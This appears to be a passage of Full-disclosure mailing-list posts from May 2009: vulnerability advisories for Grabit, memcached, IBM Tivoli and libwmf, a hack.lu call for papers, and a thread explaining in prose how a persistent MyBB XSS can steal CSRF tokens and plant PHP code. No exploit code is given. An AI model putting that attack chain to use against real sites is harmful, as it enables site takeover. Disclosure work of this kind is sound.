my_first_name_here at teusink.net (Niels Teusink) Date: Sun, 03 May 2009 23:27:56 +0200 Subject: [Full-disclosure] Grabit <= 1.7.2 beta 3 NZB file parsing stack overflow Message-ID: <49FE0C5C.70005@teusink.net> Grabit <= 1.7.2 beta 3 NZB file parsing stack overflow Impact: Remote code execution Version: <= 1.7.2 beta 3 Description Grabit is a popular Windows usenet client designed for downloading binary files. It has support for NZB files, which a user would usually acquire from an external source. Version 1.7.2 beta 3 is vulnerable to a stack overflow when parsing DTD references in NZB files. Earlier versions are vulnerable as well. Reliable exploitation is pretty straightforward. Fix I reported this to the author a while ago. He has now released version 1.7.2 beta 4, which fixes the bug. It can be downloaded at http://www.shemes.com/ Best regards, Niels Teusink http://blog.teusink.net/ From techie.micheal at gmail.com Mon May 4 00:21:51 2009 From: techie.micheal at gmail.com (Micheal Cottingham) Date: Sun, 3 May 2009 19:21:51 -0400 Subject: [Full-disclosure] =?windows-1252?q?=93Cross-Site_Scripting=94_vul?= =?windows-1252?q?nerability_in_MyBB_1=2E4=2E5?= In-Reply-To: <703DBC17-8619-4EA3-BA22-F79D1A765D54@gmail.com> References: <6aade7300905030501h5d3d62fdl5434c3b9027c980b@mail.gmail.com> <703DBC17-8619-4EA3-BA22-F79D1A765D54@gmail.com> Message-ID: That's the problem with XSS, it isn't just one. I've seen XSS that in turn injects PHP code in to an admin panel that in turn led to RCE. I've also seen XSS that led to session hijacking that in turn led to XSS which ultimately led to mass client exploitation. The bad guys have been using these multi-staged attacks for quite some time. http://www.coresecurity.com/content/understanding-multistaged-threats agrees with me. XSS is particularly nasty because it runs in the client. It is no longer just cookie stealing, but mass client exploitation, RCE, SQL injection, CSRF, and so on. It is even used to pivot in to the internal network, as is the case with MS09-002 (I think that's the one, someone please correct me if I'm wrong). Entire frameworks have been built around just XSS. For example BeEF and Jikto. This is why Jacques Copeau said that the XSS could lead to CSRF and then RCE. On Sun, May 3, 2009 at 5:19 PM, Andrew Farmer wrote: > On 03 May 09, at 05:01, Jacques Copeau wrote: >> Advisory : ?Cross-Site Scripting? vulnerability in MyBB > >> The XSS renders in all browsers and on various pages inside the myBB >> software. >> We consider it to be particularly grave, as it renders on the ACP >> user overview >> page; this can be easily exploited to construct a universal CSRF >> vulnerability >> that introduces malicious php code into the script. > > So, er, is this vulnerability XSS, CSRF, or RCE? Pick one and stick > with it. > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From hl2009 at hack.lu Mon May 4 08:55:00 2009 From: hl2009 at hack.lu (hack.lu 2009 info) Date: Mon, 04 May 2009 09:55:00 +0200 Subject: [Full-disclosure] Call for Papers Hack.lu 2009 Message-ID: <49FE9F54.3050901@hack.lu> Call for Papers Hack.lu 2009 ============================ The purpose of the hack.lu convention is to give an open and free playground where people can discuss the implication of new technologies in society. hack.lu is a balanced mix convention where technical and non-technical people can meet each other and share freely all kind of information. The convention will be held in the Grand-Duchy of Luxembourg in October 2009 (28-30.10.2009). The conference is three days of active discussions, presentations and workshops for sharing experience around new attacks, defensive techniques and information security (including funky experiments). We would like to announce the opportunity to submit papers, and/or lightning talk proposals for selection by the hack.lu technical review committee. This year we will be doing one hour talks, and some shorter talk sessions. Scope: ------ Topics of interest include, but are not limited to: - Software Engineering and Security - Honeypots/Honeynets - Spyware, Phishing and Botnets (Distributed attacks) - Newly discovered vulnerabilities in software and hardware - Electronic/Digital Privacy - Wireless Network and Security - Attacks on Information Systems and/or Digital Information Storage - Electronic Voting - Free Software and Security - Assessment of Computer, Electronic Devices and Information Systems - Standards for Information Security - Legal and Social Aspect of Information Security - Software Engineering and Security - Security in Information Retrieval - Network security - Forensics and Anti-Forensics - Mobile communications security and vulnerabilities Deadlines: ---------- The following dates are important if you want to participate in the CfP Abstract submission: no later than 15 June 2009 Full paper submission: no later than 1st August 2009 Notification date: mid/end of August Submission guideline: --------------------- Authors should submit a paper in English up to 5.000 words, using a non-proprietary and open electronic format. The program committee will review all papers and the author of each paper will be notified of the result, by electronic means. Abstract is up to 400 words. Submissions must be sent using the following interface: http://2009.hack.lu/papers/ Submissions should also include the following: 1. Presenter, and geographical location (country of origin/passport)and contact info. 2. Employer and/or affiliations. 3. Brief biography, list of publications or papers. 4. Any significant presentation and/or educational experience/background. 5. Reason why this material is innovative or significant or an important tutorial. 6. Optionally, any samples of prepared material or outlines ready. 7. Information about if yes or no the submission has already been presented and where. The information will be used only for the sole purpose of the hack.lu convention including the information on the public website. If you want to remain anonymous, you have the right to use a nickname. Speakers' Privileges: --------------------- - Accommodation will be provided (3 nights). - Travel expenses will be covered up to a max amount. - Conference speakers night. Publication and rights: ----------------------- Authors keep the full rights on their publication/papers but give an unrestricted right to redistribute their papers for the hack.lu convention and its related electronic/paper publication. Sponsoring: ----------- If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to info(AT)hack.lu Web site and wiki: ------------------ http://2009.hack.lu/ From jacquescopeau at googlemail.com Mon May 4 11:49:43 2009 From: jacquescopeau at googlemail.com (Jacques Copeau) Date: Mon, 4 May 2009 12:49:43 +0200 Subject: [Full-disclosure] =?windows-1252?q?=93Cross-Site_Scripting=94_vul?= =?windows-1252?q?nerability_in_MyBB_1=2E4=2E5?= In-Reply-To: <703DBC17-8619-4EA3-BA22-F79D1A765D54@gmail.com> References: <6aade7300905030501h5d3d62fdl5434c3b9027c980b@mail.gmail.com> <703DBC17-8619-4EA3-BA22-F79D1A765D54@gmail.com> Message-ID: <6aade7300905040349qa19bc6eg52bfc7ff0674f978@mail.gmail.com> It is quite simple; for uninformed users the three might be seen as different, but today they are the same. To explain it a bit: it is a persistent XSS. The attacker can enter it with a normal user account; however, it renders in the administration backend. Followed me so far? Great :) So, to ward against CSRF, most web scripts employ tokens, which are required parts of requests that alter the software state. With a XSS, like the one detailed in my advisory, it is trivial to include a script that parses the html of the admin page and finds the token. So, our XSS leads to an universal CSRF. With that token in turn, it is easy to trigger a different administrative change (via AJAX), for instance one that introduces PHP into a template. RCE. So, with a persistent XSS that renders in an admin backend, you have RCE. Use XSS to bypass CSRF protection; use that to introduce code. XSS->CSRF->RCE. I would have stuck with one term, but security is not so simple today. A pleasure to be of service ~JC On Sun, May 3, 2009 at 11:19 PM, Andrew Farmer wrote: > On 03 May 09, at 05:01, Jacques Copeau wrote: >> >> Advisory : ?Cross-Site Scripting? vulnerability in MyBB > > >> >> The XSS renders in all browsers and on various pages inside the myBB >> software. >> We consider it to be particularly grave, as it renders on the ACP user >> overview >> page; this can be easily exploited to construct a universal CSRF >> vulnerability >> that introduces malicious php code into the script. > > So, er, is this vulnerability XSS, CSRF, or RCE? Pick one and stick with it. From mbs at mistrealm.com Mon May 4 14:15:23 2009 From: mbs at mistrealm.com (mbs) Date: Mon, 04 May 2009 09:15:23 -0400 Subject: [Full-disclosure] Full-disclosure Anti virus installations on Windows servers In-Reply-To: <2d6724810905011052o2259e313q75c06d84ac14015a@mail.gmail.com> References: <2d6724810904291229k2990e62al94cdd95f6ee040b7@mail.gmail.com> <20090501142903.BBD.0@paddy.troja.mff.cuni.cz> <2d6724810905011052o2259e313q75c06d84ac14015a@mail.gmail.com> Message-ID: <49FEEA6B.6030803@mistrealm.com> An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090504/ae961c64/attachment.html From security at mandriva.com Mon May 4 14:05:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Mon, 04 May 2009 15:05:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:105 ] memcached Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:105 http://www.mandriva.com/security/ _______________________________________________________________________ Package : memcached Date : May 4, 2009 Affected: 2009.0, 2009.1, Corporate 4.0 _______________________________________________________________________ Problem Description: The process_stat function in Memcached prior 1.2.8 discloses memory-allocation statistics in response to a stats malloc command, which allows remote attackers to obtain potentially sensitive information by sending this command to the daemon's TCP port (CVE-2009-1255, CVE-2009-1494). The updated packages have been patched to prevent this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1255 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1494 _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.0: 83f694e936c96cc44879dd80763766c5 2009.0/i586/memcached-1.2.6-2.1mdv2009.0.i586.rpm 53434fb685cdc440af735ff26fac04c6 2009.0/SRPMS/memcached-1.2.6-2.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: c4b61db8185bd7315cb4bed3ad373b96 2009.0/x86_64/memcached-1.2.6-2.1mdv2009.0.x86_64.rpm 53434fb685cdc440af735ff26fac04c6 2009.0/SRPMS/memcached-1.2.6-2.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 02482319db1fa17cef02bce51631b187 2009.1/i586/memcached-1.2.6-4.1mdv2009.1.i586.rpm 73716bff70c37267619823c7658f79ba 2009.1/SRPMS/memcached-1.2.6-4.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 60e92b7d6a84b74b7ff66d60a2d7917c 2009.1/x86_64/memcached-1.2.6-4.1mdv2009.1.x86_64.rpm 73716bff70c37267619823c7658f79ba 2009.1/SRPMS/memcached-1.2.6-4.1mdv2009.1.src.rpm Corporate 4.0: af73aa510b773292eb35d505318c3781 corporate/4.0/i586/memcached-1.1.12-4.1.20060mlcs4.i586.rpm 811c8c13edcc46348e2a97bc52e23b18 corporate/4.0/SRPMS/memcached-1.1.12-4.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 9d151d93ed23fd45a5c091e67751bc0c corporate/4.0/x86_64/memcached-1.1.12-4.1.20060mlcs4.x86_64.rpm 811c8c13edcc46348e2a97bc52e23b18 corporate/4.0/SRPMS/memcached-1.1.12-4.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJ/rxNmqjQ0CJFipgRAgytAKDHAsrLjrf2ofI1krLj8mVE6vnJ4ACg13Qp eOnsfDAnOrG2ycEtYroVJnE= =YHdj -----END PGP SIGNATURE----- From remove-vuln at secunia.com Mon May 4 13:13:26 2009 From: remove-vuln at secunia.com (Secunia Research) Date: Mon, 4 May 2009 14:13:26 +0200 Subject: [Full-disclosure] Secunia Research: IBM Tivoli Storage Manager Remote Agent Service Buffer Overflows Message-ID: <200905041213.n44CDQNC018899@ca.secunia.com> ====================================================================== Secunia Research 04/05/2009 - IBM Tivoli Storage Manager Remote Agent Service Buffer Overflows - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 ====================================================================== 1) Affected Software * IBM Tivoli Storage Manager Express Client 5.3.6.2 NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Moderately critical Impact: System access Where: Local network ====================================================================== 3) Vendor's Description of Software "IBM Tivoli Storage Manager family of offerings are designed to provide centralized, automated data protection". Product Link: http://www-01.ibm.com/software/tivoli/products/storage-mgr/ ====================================================================== 4) Description of Vulnerability Secunia Research has discovered two vulnerabilities in IBM Tivoli Storage Manager Agent Client (dsmagent.exe), which can be exploited by malicious people to compromise a vulnerable system. 1) A boundary error in a generic string handling function when parsing strings from request packets can be exploited to cause stack-based buffer overflow. 2) A boundary error when copying the NodeName from a request packet in dicuGetIdentifyRequest can be exploited to cause a stack-based buffer overflow. Successful exploitation allows execution of arbitrary code. ====================================================================== 5) Solution Apply patches. ====================================================================== 6) Time Table 13/11/2008 - Vendor notified. 18/11/2008 - Vendor response. 20/11/2008 - Vendor asks for additional information. 20/11/2008 - Clarification of the two problems provided to the vendor. 26/11/2008 - Vendor provides status update. 02/02/2009 - Vendor provides status update. 24/02/2009 - Vendor provides status update. 31/03/2009 - Status update requested. 31/03/2009 - Vendor provides status update. 04/05/2009 - Public disclosure. ====================================================================== 7) Credits Discovered by Dyon Balding, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2008-4828 for the vulnerabilities. IBM (IC59513, IC59994, IC59779, IC59781): http://www-01.ibm.com/support/docview.wss?uid=swg21384389 ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2008-55/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From marc.deslauriers at canonical.com Mon May 4 15:46:45 2009 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Mon, 04 May 2009 10:46:45 -0400 Subject: [Full-disclosure] [USN-769-1] libwmf vulnerability Message-ID: <1241448405.6379.4.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-769-1 May 04, 2009 libwmf vulnerability CVE-2009-1364 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libwmf0.2-7 0.2.8.3-3.1ubuntu0.2 Ubuntu 8.04 LTS: libwmf0.2-7 0.2.8.4-6ubuntu0.8.04.1 Ubuntu 8.10: libwmf0.2-7 0.2.8.4-6ubuntu0.8.10.1 Ubuntu 9.04: libwmf0.2-7 0.2.8.4-6ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Tavis Ormandy discovered that libwmf incorrectly used memory after it had been freed when using its embedded GD library. If a user or automated system were tricked into opening a crafted WMF file, an attacker could cause a denial of service or execute arbitrary code with privileges of the user invoking the program. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf_0.2.8.3-3.1ubuntu0.2.diff.gz Size/MD5: 7548 1693ed2495751dcd73fc8e7831e0f7b3 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf_0.2.8.3-3.1ubuntu0.2.dsc Size/MD5: 793 2ddea51c8941c40224ecbf1be95acbc7 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf_0.2.8.3.orig.tar.gz Size/MD5: 1737021 c7246bb724664189ade7895547387e6a Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-doc_0.2.8.3-3.1ubuntu0.2_all.deb Size/MD5: 271716 96e8d4db4814825634dd6405cd32e661 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-dev_0.2.8.3-3.1ubuntu0.2_amd64.deb Size/MD5: 207388 b9592ee21a871f90c618ccb4e309fceb http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.3-3.1ubuntu0.2_amd64.deb Size/MD5: 182416 d8d8bf445c26d45277150e63f3e07e0f http://security.ubuntu.com/ubuntu/pool/universe/libw/libwmf/libwmf-bin_0.2.8.3-3.1ubuntu0.2_amd64.deb Size/MD5: 17944 4dd4b1fcd5e2cf58edd55559261a8893 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-dev_0.2.8.3-3.1ubuntu0.2_i386.deb Size/MD5: 186190 b50a22929e5c58d64dddfd1dc5759c35 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.3-3.1ubuntu0.2_i386.deb Size/MD5: 167294 8eb6710e251969c670919faf0ac0d316 http://security.ubuntu.com/ubuntu/pool/universe/libw/libwmf/libwmf-bin_0.2.8.3-3.1ubuntu0.2_i386.deb Size/MD5: 16286 ac1b771cbab2ec97903515fcc0d502ef powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-dev_0.2.8.3-3.1ubuntu0.2_powerpc.deb Size/MD5: 207382 17861a22d0b851f3ae565050d6b5f944 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.3-3.1ubuntu0.2_powerpc.deb Size/MD5: 186342 1cdc9f3177873d0991df70dd94274164 http://security.ubuntu.com/ubuntu/pool/universe/libw/libwmf/libwmf-bin_0.2.8.3-3.1ubuntu0.2_powerpc.deb Size/MD5: 23136 1f88bd61ca71dc25c811eb87019e5318 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-dev_0.2.8.3-3.1ubuntu0.2_sparc.deb Size/MD5: 202306 36a414f896e6b9c0cd85fb80adcdc3a2 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.3-3.1ubuntu0.2_sparc.deb Size/MD5: 176046 ea143767a8b47e38c705d7f63514eb38 http://security.ubuntu.com/ubuntu/pool/universe/libw/libwmf/libwmf-bin_0.2.8.3-3.1ubuntu0.2_sparc.deb Size/MD5: 17062 ba9845b780219b6280d245df9871dcae Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf_0.2.8.4-6ubuntu0.8.04.1.diff.gz Size/MD5: 7945 db9719db8b4185a2dc1dfd9c7502a840 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf_0.2.8.4-6ubuntu0.8.04.1.dsc Size/MD5: 897 aa5a40fac6d3a20e262b676a6ffb9905 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf_0.2.8.4.orig.tar.gz Size/MD5: 2169375 d1177739bf1ceb07f57421f0cee191e0 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-doc_0.2.8.4-6ubuntu0.8.04.1_all.deb Size/MD5: 271782 067cc55b9a443ccb54640265c83d2713 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu0.8.04.1_amd64.deb Size/MD5: 204758 8d00854e0f547a1ba43a6273d989753e http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu0.8.04.1_amd64.deb Size/MD5: 182500 8f982b8f49392e464d8ee6dfcf5c7d45 http://security.ubuntu.com/ubuntu/pool/universe/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu0.8.04.1_amd64.deb Size/MD5: 18628 8bd56a6e3c735459894df6d35cca5069 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu0.8.04.1_i386.deb Size/MD5: 190508 8719abb2577f1e835809901d278a1cc3 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu0.8.04.1_i386.deb Size/MD5: 174632 f0c237795563bc56e93a30b2420be5d8 http://security.ubuntu.com/ubuntu/pool/universe/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu0.8.04.1_i386.deb Size/MD5: 16854 51f4fa4bdea92af7adc8414d77c4f940 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu0.8.04.1_lpia.deb Size/MD5: 190544 0be66144da34d745b6a205e39acf6b8d http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu0.8.04.1_lpia.deb Size/MD5: 175152 6e321d7e9535b094a49cda9cca39cd98 http://ports.ubuntu.com/pool/universe/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu0.8.04.1_lpia.deb Size/MD5: 16912 4ff571582af7b37e8bbf69c410e174e4 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu0.8.04.1_powerpc.deb Size/MD5: 208426 3f9a023a87a4b83cb773892caabd0995 http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu0.8.04.1_powerpc.deb Size/MD5: 193284 53296daa6fee0c24910bccf542aeab5c http://ports.ubuntu.com/pool/universe/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu0.8.04.1_powerpc.deb Size/MD5: 26614 d5f2e2ba285723762a04276cdd7788bf sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu0.8.04.1_sparc.deb Size/MD5: 198188 541e5763f6b8c93e5c7fd3ad4c5036dd http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu0.8.04.1_sparc.deb Size/MD5: 174884 3a7230c7e0a3ee6c4d338bbbfc51b8d6 http://ports.ubuntu.com/pool/universe/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu0.8.04.1_sparc.deb Size/MD5: 18216 9a1750b1705281550cc63b12263122eb Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf_0.2.8.4-6ubuntu0.8.10.1.diff.gz Size/MD5: 7947 3d9209546d67ea082b3f0bbfed1eda90 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf_0.2.8.4-6ubuntu0.8.10.1.dsc Size/MD5: 1307 8e55c1cd1eebccde6dddbe717edbea01 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf_0.2.8.4.orig.tar.gz Size/MD5: 2169375 d1177739bf1ceb07f57421f0cee191e0 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-doc_0.2.8.4-6ubuntu0.8.10.1_all.deb Size/MD5: 271786 3ca10a1afb13e2c4869b3a61ccca2f9c amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu0.8.10.1_amd64.deb Size/MD5: 18226 3ff0320cac60266fbede66a12d94e722 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu0.8.10.1_amd64.deb Size/MD5: 207528 c8080917e04e780dcb7949b942315fcf http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu0.8.10.1_amd64.deb Size/MD5: 185396 dd4b18c6101536755ec2059fa9ace7d7 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu0.8.10.1_i386.deb Size/MD5: 16320 3e4ea0e6701bb7c1b361f400a197789e http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu0.8.10.1_i386.deb Size/MD5: 191792 7f2520ac7a4df757be3fac75aa1f8b3d http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu0.8.10.1_i386.deb Size/MD5: 175384 0688b920531b4bc30622df181049a969 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu0.8.10.1_lpia.deb Size/MD5: 16296 3ab52a223003ac3f1f75b15bbe94c2c7 http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu0.8.10.1_lpia.deb Size/MD5: 192812 2c3bb8fdd898b2ea244835aac37bf91e http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu0.8.10.1_lpia.deb Size/MD5: 175724 8a8a91ff084707ffc2c188ed82abaf9b powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu0.8.10.1_powerpc.deb Size/MD5: 24438 dea1c25c5743967ac2e9bc720a5b53d0 http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu0.8.10.1_powerpc.deb Size/MD5: 210326 c972df4317570606da04f5037669f69d http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu0.8.10.1_powerpc.deb Size/MD5: 195412 bf27b10058ad33b9d7070cecfd10cc9a sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu0.8.10.1_sparc.deb Size/MD5: 18292 312e37cc9675e1c5ce1982b0d3d9c2f0 http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu0.8.10.1_sparc.deb Size/MD5: 201314 2fc36c07e6f7a7bb9412b814d79c3e09 http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu0.8.10.1_sparc.deb Size/MD5: 176600 f078e4b862815fff7c26dfd3c952af3b Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf_0.2.8.4-6ubuntu1.1.diff.gz Size/MD5: 8054 75778c8b1637e8105a7d57c22f10fb1d http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf_0.2.8.4-6ubuntu1.1.dsc Size/MD5: 1304 73331bc4957b531fa309e4defaaa61e8 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf_0.2.8.4.orig.tar.gz Size/MD5: 2169375 d1177739bf1ceb07f57421f0cee191e0 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-doc_0.2.8.4-6ubuntu1.1_all.deb Size/MD5: 271766 85012965dbe448e39dbd770149873231 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu1.1_amd64.deb Size/MD5: 18224 9dabf870549fe87e2a07a0c5169ef858 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu1.1_amd64.deb Size/MD5: 207486 953705c1d863cfb6e35d26cb8f14c9ee http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf0.2-7-gtk_0.2.8.4-6ubuntu1.1_amd64.deb Size/MD5: 20924 1176ff52c290e7e6237416b3f8f11d53 http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu1.1_amd64.deb Size/MD5: 182256 b9e6cdd69feb940940d2913d73b9beb9 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu1.1_i386.deb Size/MD5: 16326 6dd791cdcf2a5e80231d7175c82dc0fe http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu1.1_i386.deb Size/MD5: 191744 e5ecc9eab79e93ec0a8cac1662367a9c http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf0.2-7-gtk_0.2.8.4-6ubuntu1.1_i386.deb Size/MD5: 20688 43cdff77db7b69642d3f30b3eea62f3b http://security.ubuntu.com/ubuntu/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu1.1_i386.deb Size/MD5: 172432 06df097a479c63b16c5e2d3055e1b9f4 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu1.1_lpia.deb Size/MD5: 16286 b6a14684d53478a10c5d5806bf9c4510 http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu1.1_lpia.deb Size/MD5: 192746 7955ed46b6fd5016da6cdaee7f9f3a2a http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf0.2-7-gtk_0.2.8.4-6ubuntu1.1_lpia.deb Size/MD5: 20602 8cd2b29d7615c83af5f11cd37d880cdc http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu1.1_lpia.deb Size/MD5: 172836 81098a45b48473a75c485c184d9598c0 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu1.1_powerpc.deb Size/MD5: 24434 3f8a54144a10505439d5aade24cf0b23 http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu1.1_powerpc.deb Size/MD5: 210282 